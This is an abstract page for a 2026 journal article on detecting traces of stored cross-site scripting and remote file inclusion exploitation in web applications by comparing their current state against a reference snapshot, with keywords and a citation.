Shipulin Georgy Farizovich (PhD in Law, Associate Professor, RTU MIREA; Associate Professor, Moscow Polytechnic University)
| |
The article is devoted to issues related to the identification of traces of exploitation of vulnerabilities in web applications of the Injections class according to the updated OWASP Top 10 classification of 2025 using the example of vulnerabilities in stored cross-site scripting and remote file inclusion. The proposed approach to detecting post-exploitation (traces of exploitation) vulnerabilities is based on comparing the current state of a web application with its image of a reference state and subsequent analysis of changes in web application data (files and rows of target database tables) and includes five procedures: forming an image of a reference state; determining changes in the current state; analyzing and evaluating changes in the current state. states; updating data on changes to the current and previous states; updating the image of the reference state of the system. To test the proposed approach in relation to detecting traces of exploitation of vulnerabilities in stored cross-site scripting and remote inclusion of files, a software tool was developed and tested to confirm its applicability. The limited application of the proposed approach is determined by the peculiarities of exploiting certain vulnerabilities of the Injections class, as a result of which no changes are made to the structure and content of the attacked web application.
Keywords:vulnerabilities, web applications, stored cross-site scripting, detection of post-exploitation of web vulnerabilities, traces of exploitation of web vulnerabilities, OWASP, information security.
|
|
| |
|
Read the full article …
|
Citation link:
Shipulin G. F. AN APPROACH TO DETECTING TRACES OF EXPLOITING VULNERABILITIES IN WEB APPLICATIONS OF THE INJECTIONS CLASS USING THE EXAMPLE OF VULNERABILITIES IN STORED CROSS-SITE SCRIPTING AND REMOTE FILE INCLUSION // Современная наука: актуальные проблемы теории и практики. Серия: Естественные и Технические Науки. -2026. -№02/2. -С. 139-142 DOI 10.37882/2223-2966.2026.02-2.32 |
|
|
LEGAL
INFORMATION:
